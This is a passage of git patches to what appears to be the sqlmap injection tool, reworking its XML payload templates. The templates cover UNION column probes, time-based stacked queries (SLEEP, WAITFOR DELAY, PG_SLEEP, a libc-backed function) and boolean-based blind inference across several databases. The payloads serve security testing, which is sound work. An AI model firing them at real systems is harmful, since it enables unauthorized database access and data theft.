+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>#</comment>
+            <char>[CHAR]</char>
+            <columns>1-10</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL UNION query (NULL) - 1 to 10 columns</title>
+        <stype>3</stype>
+        <level>1</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>#</comment>
+            <char>NULL</char>
+            <columns>1-10</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL UNION query ([RANDNUM]) - 1 to 10 columns</title>
+        <stype>3</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>#</comment>
+            <char>[RANDNUM]</char>
+            <columns>1-10</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL UNION query ([CHAR]) - 11 to 20 columns</title>
+        <stype>3</stype>
+        <level>2</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>#</comment>
+            <char>[CHAR]</char>
+            <columns>11-20</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL UNION query (NULL) - 11 to 20 columns</title>
+        <stype>3</stype>
+        <level>2</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>#</comment>
+            <char>NULL</char>
+            <columns>11-20</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL UNION query ([RANDNUM]) - 11 to 20 columns</title>
+        <stype>3</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>#</comment>
+            <char>[RANDNUM]</char>
+            <columns>11-20</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL UNION query ([CHAR]) - 21 to 30 columns</title>
+        <stype>3</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>#</comment>
+            <char>[CHAR]</char>
+            <columns>21-30</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL UNION query (NULL) - 21 to 30 columns</title>
+        <stype>3</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>#</comment>
+            <char>NULL</char>
+            <columns>21-30</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL UNION query ([RANDNUM]) - 21 to 30 columns</title>
+        <stype>3</stype>
+        <level>4</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>#</comment>
+            <char>[RANDNUM]</char>
+            <columns>21-30</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL UNION query ([CHAR]) - 31 to 40 columns</title>
+        <stype>3</stype>
+        <level>4</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>#</comment>
+            <char>[CHAR]</char>
+            <columns>31-40</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL UNION query (NULL) - 31 to 40 columns</title>
+        <stype>3</stype>
+        <level>4</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>#</comment>
+            <char>NULL</char>
+            <columns>31-40</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL UNION query ([RANDNUM]) - 31 to 40 columns</title>
+        <stype>3</stype>
+        <level>5</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>#</comment>
+            <char>[RANDNUM]</char>
+            <columns>31-40</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL UNION query ([CHAR]) - 41 to 50 columns</title>
+        <stype>3</stype>
+        <level>5</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>#</comment>
+            <char>[CHAR]</char>
+            <columns>41-50</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL UNION query (NULL) - 41 to 50 columns</title>
+        <stype>3</stype>
+        <level>5</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>#</comment>
+            <char>NULL</char>
+            <columns>41-50</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL UNION query ([RANDNUM]) - 41 to 50 columns</title>
+        <stype>3</stype>
+        <level>5</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>#</comment>
+            <char>[RANDNUM]</char>
+            <columns>41-50</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>Generic UNION query ([CHAR]) - [COLSTART] to [COLSTOP] columns (custom)</title>
+        <stype>3</stype>
+        <level>1</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>-- </comment>
+            <char>[CHAR]</char>
+            <columns>[COLSTART]-[COLSTOP]</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+    </test>
+
+    <test>
+        <title>Generic UNION query (NULL) - [COLSTART] to [COLSTOP] columns (custom)</title>
+        <stype>3</stype>
+        <level>1</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>-- </comment>
+            <char>NULL</char>
+            <columns>[COLSTART]-[COLSTOP]</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+    </test>
+
+    <test>
+        <title>Generic UNION query ([RANDNUM]) - [COLSTART] to [COLSTOP] columns (custom)</title>
+        <stype>3</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>-- </comment>
+            <char>[RANDNUM]</char>
+            <columns>[COLSTART]-[COLSTOP]</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+    </test>
+
+    <test>
+        <title>Generic UNION query ([CHAR]) - 1 to 10 columns</title>
+        <stype>3</stype>
+        <level>1</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>-- </comment>
+            <char>[CHAR]</char>
+            <columns>1-10</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+    </test>
+
+    <test>
+        <title>Generic UNION query (NULL) - 1 to 10 columns</title>
+        <stype>3</stype>
+        <level>1</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>-- </comment>
+            <char>NULL</char>
+            <columns>1-10</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+    </test>
+
+    <test>
+        <title>Generic UNION query ([RANDNUM]) - 1 to 10 columns</title>
+        <stype>3</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>-- </comment>
+            <char>[RANDNUM]</char>
+            <columns>1-10</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+    </test>
+
+    <test>
+        <title>Generic UNION query ([CHAR]) - 11 to 20 columns</title>
+        <stype>3</stype>
+        <level>2</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>-- </comment>
+            <char>[CHAR]</char>
+            <columns>11-20</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+    </test>
+
+    <test>
+        <title>Generic UNION query (NULL) - 11 to 20 columns</title>
+        <stype>3</stype>
+        <level>2</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>-- </comment>
+            <char>NULL</char>
+            <columns>11-20</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+    </test>
+
+    <test>
+        <title>Generic UNION query ([RANDNUM]) - 11 to 20 columns</title>
+        <stype>3</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>-- </comment>
+            <char>[RANDNUM]</char>
+            <columns>11-20</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+    </test>
+
+    <test>
+        <title>Generic UNION query ([CHAR]) - 21 to 30 columns</title>
+        <stype>3</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>-- </comment>
+            <char>[CHAR]</char>
+            <columns>21-30</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+    </test>
+
+    <test>
+        <title>Generic UNION query (NULL) - 21 to 30 columns</title>
+        <stype>3</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>-- </comment>
+            <char>NULL</char>
+            <columns>21-30</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+    </test>
+
+    <test>
+        <title>Generic UNION query ([RANDNUM]) - 21 to 30 columns</title>
+        <stype>3</stype>
+        <level>4</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>-- </comment>
+            <char>[RANDNUM]</char>
+            <columns>21-30</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+    </test>
+
+    <test>
+        <title>Generic UNION query ([CHAR]) - 31 to 40 columns</title>
+        <stype>3</stype>
+        <level>4</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>-- </comment>
+            <char>[CHAR]</char>
+            <columns>31-40</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+    </test>
+
+    <test>
+        <title>Generic UNION query (NULL) - 31 to 40 columns</title>
+        <stype>3</stype>
+        <level>4</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>-- </comment>
+            <char>NULL</char>
+            <columns>31-40</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+    </test>
+
+    <test>
+        <title>Generic UNION query ([RANDNUM]) - 31 to 40 columns</title>
+        <stype>3</stype>
+        <level>5</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>-- </comment>
+            <char>[RANDNUM]</char>
+            <columns>31-40</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+    </test>
+
+    <test>
+        <title>Generic UNION query ([CHAR]) - 41 to 50 columns</title>
+        <stype>3</stype>
+        <level>5</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>-- </comment>
+            <char>[CHAR]</char>
+            <columns>41-50</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+    </test>
+    <test>
+        <title>Generic UNION query (NULL) - 41 to 50 columns</title>
+        <stype>3</stype>
+        <level>5</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>-- </comment>
+            <char>NULL</char>
+            <columns>41-50</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+    </test>
+
+    <test>
+        <title>Generic UNION query ([RANDNUM]) - 41 to 50 columns</title>
+        <stype>3</stype>
+        <level>5</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>-- </comment>
+            <char>[RANDNUM]</char>
+            <columns>41-50</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+    </test>
+    <!-- End of UNION query tests -->
+</root>

From 1e9586c90b7204a43862bcae0ca7823c576e05a6 Mon Sep 17 00:00:00 2001
From: Bernardo Damele <bernardo.damele@gmail.com>
Date: Thu, 19 Feb 2015 16:18:16 +0000
Subject: [PATCH 344/492] minor layout fix

---
 xml/boundaries.xml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/xml/boundaries.xml b/xml/boundaries.xml
index 0da7a6036..f33498924 100644
--- a/xml/boundaries.xml
+++ b/xml/boundaries.xml
@@ -412,7 +412,7 @@ Formats:
     </boundary>
     <!-- End of pre-WHERE generic boundaries -->
 
-    <!-- Pre-WHERE derived table boundaries (e.g. "SELECT * FROM (SELECT column FROM table WHERE column LIKE '%$_REQUEST["name"]%') AS t1"-->
+    <!-- Pre-WHERE derived table boundaries - e.g. "SELECT * FROM (SELECT column FROM table WHERE column LIKE '%$_REQUEST["name"]%') AS t1"-->
     <boundary>
         <level>5</level>
         <clause>1</clause>

From 4195f770a3f529e5f9c9d8da1443851123c81c80 Mon Sep 17 00:00:00 2001
From: Bernardo Damele <bernardo.damele@gmail.com>
Date: Thu, 19 Feb 2015 16:41:55 +0000
Subject: [PATCH 345/492] removing one unnecessary character from stacked
 payloads

---
 xml/payloads/04_stacked_queries.xml | 56 ++++++++++++++---------------
 1 file changed, 28 insertions(+), 28 deletions(-)

diff --git a/xml/payloads/04_stacked_queries.xml b/xml/payloads/04_stacked_queries.xml
index 8eb334738..77641a9a9 100644
--- a/xml/payloads/04_stacked_queries.xml
+++ b/xml/payloads/04_stacked_queries.xml
@@ -9,9 +9,9 @@
         <risk>0</risk>
         <clause>0</clause>
         <where>1</where>
-        <vector>; (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
+        <vector>;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
         <request>
-            <payload>; (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
+            <payload>;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
         </request>
         <response>
             <time>[SLEEPTIME]</time>
@@ -29,9 +29,9 @@
         <risk>0</risk>
         <clause>0</clause>
         <where>1</where>
-        <vector>; (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
+        <vector>;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
         <request>
-            <payload>; (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
+            <payload>;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
             <comment>#</comment>
         </request>
         <response>
@@ -50,9 +50,9 @@
         <risk>0</risk>
         <clause>0</clause>
         <where>1</where>
-        <vector>; SELECT IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
+        <vector>;SELECT IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
         <request>
-            <payload>; SELECT SLEEP([SLEEPTIME])</payload>
+            <payload>;SELECT SLEEP([SLEEPTIME])</payload>
             <comment>-- </comment>
         </request>
         <response>
@@ -71,9 +71,9 @@
         <risk>2</risk>
         <clause>0</clause>
         <where>1</where>
-        <vector>; SELECT IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])</vector>
+        <vector>;SELECT IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])</vector>
         <request>
-            <payload>; SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))</payload>
+            <payload>;SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))</payload>
             <comment>-- </comment>
         </request>
         <response>
@@ -91,9 +91,9 @@
         <risk>0</risk>
         <clause>0</clause>
         <where>1</where>
-        <vector>; SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
+        <vector>;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
         <request>
-            <payload>; SELECT PG_SLEEP([SLEEPTIME])</payload>
+            <payload>;SELECT PG_SLEEP([SLEEPTIME])</payload>
             <comment>--</comment>
         </request>
         <response>
@@ -112,9 +112,9 @@
         <risk>2</risk>
         <clause>0</clause>
         <where>1</where>
-        <vector>; SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>
+        <vector>;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>
         <request>
-            <payload>; SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)</payload>
+            <payload>;SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)</payload>
             <comment>--</comment>
         </request>
         <response>
@@ -132,9 +132,9 @@
         <risk>0</risk>
         <clause>0</clause>
         <where>1</where>
-        <vector>; SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
+        <vector>;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
         <request>
-            <payload>; CREATE OR REPLACE FUNCTION SLEEP(int) RETURNS int AS '/lib/libc.so.6','sleep' language 'C' STRICT; SELECT sleep([SLEEPTIME])</payload>
+            <payload>;CREATE OR REPLACE FUNCTION SLEEP(int) RETURNS int AS '/lib/libc.so.6','sleep' language 'C' STRICT; SELECT sleep([SLEEPTIME])</payload>
             <comment>--</comment>
         </request>
         <response>
@@ -154,9 +154,9 @@
         <risk>0</risk>
         <clause>0</clause>
         <where>1</where>
-        <vector>; IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'</vector>
+        <vector>;IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'</vector>
         <request>
-            <payload>; WAITFOR DELAY '0:0:[SLEEPTIME]'</payload>
+            <payload>;WAITFOR DELAY '0:0:[SLEEPTIME]'</payload>
             <comment>--</comment>
         </request>
         <response>
@@ -176,9 +176,9 @@
         <risk>0</risk>
         <clause>0</clause>
         <where>1</where>
-        <vector>; SELECT CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END FROM DUAL</vector>
+        <vector>;SELECT CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END FROM DUAL</vector>
         <request>
-            <payload>; SELECT DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) FROM DUAL</payload>
+            <payload>;SELECT DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) FROM DUAL</payload>
             <comment>--</comment>
         </request>
         <response>
@@ -196,9 +196,9 @@
         <risk>2</risk>
         <clause>0</clause>
         <where>1</where>
-        <vector>; SELECT CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END FROM DUAL</vector>
+        <vector>;SELECT CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END FROM DUAL</vector>
         <request>
-            <payload>; SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5</payload>
+            <payload>;SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5</payload>
             <comment>--</comment>
         </request>
         <response>
@@ -216,9 +216,9 @@
         <risk>0</risk>
         <clause>0</clause>
         <where>1</where>
-        <vector>; BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END</vector>
+        <vector>;BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END</vector>
         <request>
-            <payload>; BEGIN DBMS_LOCK.SLEEP([SLEEPTIME]); END</payload>
+            <payload>;BEGIN DBMS_LOCK.SLEEP([SLEEPTIME]); END</payload>
             <comment>--</comment>
         </request>
         <response>
@@ -236,9 +236,9 @@
         <risk>0</risk>
         <clause>0</clause>
         <where>1</where>
-        <vector>; BEGIN IF ([INFERENCE]) THEN USER_LOCK.SLEEP([SLEEPTIME]); ELSE USER_LOCK.SLEEP(0); END IF; END</vector>
+        <vector>;BEGIN IF ([INFERENCE]) THEN USER_LOCK.SLEEP([SLEEPTIME]); ELSE USER_LOCK.SLEEP(0); END IF; END</vector>
         <request>
-            <payload>; BEGIN USER_LOCK.SLEEP([SLEEPTIME]); END</payload>
+            <payload>;BEGIN USER_LOCK.SLEEP([SLEEPTIME]); END</payload>
             <comment>--</comment>
         </request>
         <response>
@@ -256,9 +256,9 @@
         <risk>2</risk>
         <clause>0</clause>
         <where>1</where>
-        <vector>; SELECT (CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)</vector>
+        <vector>;SELECT (CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)</vector>
         <request>
-            <payload>; SELECT LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))</payload>
+            <payload>;SELECT LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))</payload>
             <comment>--</comment>
         </request>
         <response>
@@ -277,9 +277,9 @@
         <risk>2</risk>
         <clause>0</clause>
         <where>1</where>
-        <vector>; SELECT IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM]) FROM RDB$DATABASE</vector>
+        <vector>;SELECT IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM]) FROM RDB$DATABASE</vector>
         <request>
-            <payload>; SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4</payload>
+            <payload>;SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4</payload>
             <comment>--</comment>
         </request>
         <response>

From f547a776d84e822b4bec390896e52fbf334b29fd Mon Sep 17 00:00:00 2001
From: Bernardo Damele <bernardo.damele@gmail.com>
Date: Thu, 19 Feb 2015 16:42:26 +0000
Subject: [PATCH 346/492] consolidating blind based payloads - issue #1169

---
 xml/payloads/01_boolean_blind.xml | 486 ++++++++++++++++++++++++++----
 1 file changed, 428 insertions(+), 58 deletions(-)

diff --git a/xml/payloads/01_boolean_blind.xml b/xml/payloads/01_boolean_blind.xml
index 34cf5f2bc..dc7008767 100644
--- a/xml/payloads/01_boolean_blind.xml
+++ b/xml/payloads/01_boolean_blind.xml
@@ -32,7 +32,6 @@ Tag: <test>
         Likelihood of a payload to damage the data integrity.
 
         Valid values:
-            0: No risk
             1: Low risk
             2: Medium risk
             3: High risk
@@ -171,10 +170,27 @@ Tag: <test>
         </response>
     </test>
 
+    <test>
+        <title>AND boolean-based blind - WHERE or HAVING clause (Generic comment)</title>
+        <stype>1</stype>
+        <level>2</level>
+        <risk>1</risk>
+        <clause>1</clause>
+        <where>1</where>
+        <vector>AND [INFERENCE]</vector>
+        <request>
+            <payload>AND [RANDNUM]=[RANDNUM]</payload>
+            <comment>-- </comment>
+        </request>
+        <response>
+            <comparison>AND [RANDNUM]=[RANDNUM1]</comparison>
+        </response>
+    </test>
+
     <test>
         <title>AND boolean-based blind - WHERE or HAVING clause (MySQL comment)</title>
         <stype>1</stype>
-        <level>4</level>
+        <level>3</level>
         <risk>1</risk>
         <clause>1</clause>
         <where>1</where>
@@ -192,24 +208,23 @@ Tag: <test>
     </test>
 
     <test>
-        <title>AND boolean-based blind - WHERE or HAVING clause (Generic comment)</title>
+        <title>OR boolean-based blind - WHERE or HAVING clause</title>
         <stype>1</stype>
-        <level>4</level>
-        <risk>1</risk>
+        <level>1</level>
+        <risk>3</risk>
         <clause>1</clause>
-        <where>1</where>
-        <vector>AND [INFERENCE]</vector>
+        <where>2</where>
+        <vector>OR ([INFERENCE])</vector>
         <request>
-            <payload>AND [RANDNUM]=[RANDNUM]</payload>
-            <comment>-- </comment>
+            <payload>OR ([RANDNUM]=[RANDNUM])</payload>
         </request>
         <response>
-            <comparison>AND [RANDNUM]=[RANDNUM1]</comparison>
+            <comparison>OR ([RANDNUM]=[RANDNUM1])</comparison>
         </response>
     </test>
 
     <test>
-        <title>OR boolean-based blind - WHERE or HAVING clause</title>
+        <title>OR boolean-based blind - WHERE or HAVING clause (Generic comment)</title>
         <stype>1</stype>
         <level>2</level>
         <risk>3</risk>
@@ -218,6 +233,7 @@ Tag: <test>
         <vector>OR ([INFERENCE])</vector>
         <request>
             <payload>OR ([RANDNUM]=[RANDNUM])</payload>
+            <comment>-- </comment>
         </request>
         <response>
             <comparison>OR ([RANDNUM]=[RANDNUM1])</comparison>
@@ -244,23 +260,6 @@ Tag: <test>
         </details>
     </test>
 
-    <test>
-        <title>OR boolean-based blind - WHERE or HAVING clause (Generic comment)</title>
-        <stype>1</stype>
-        <level>3</level>
-        <risk>3</risk>
-        <clause>1</clause>
-        <where>2</where>
-        <vector>OR ([INFERENCE])</vector>
-        <request>
-            <payload>OR ([RANDNUM]=[RANDNUM])</payload>
-            <comment>-- </comment>
-        </request>
-        <response>
-            <comparison>OR ([RANDNUM]=[RANDNUM1])</comparison>
-        </response>
-    </test>
-
     <test>
         <title>MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)</title>
         <stype>1</stype>
@@ -283,12 +282,28 @@ Tag: <test>
 
     <!-- Boolean-based blind tests - Parameter replace -->
     <test>
-        <title>Generic boolean-based blind - Parameter replace (original value)</title>
+        <title>Generic boolean-based blind - Parameter replace</title>
         <stype>1</stype>
         <level>2</level>
         <risk>1</risk>
         <clause>1,2,3</clause>
         <where>3</where>
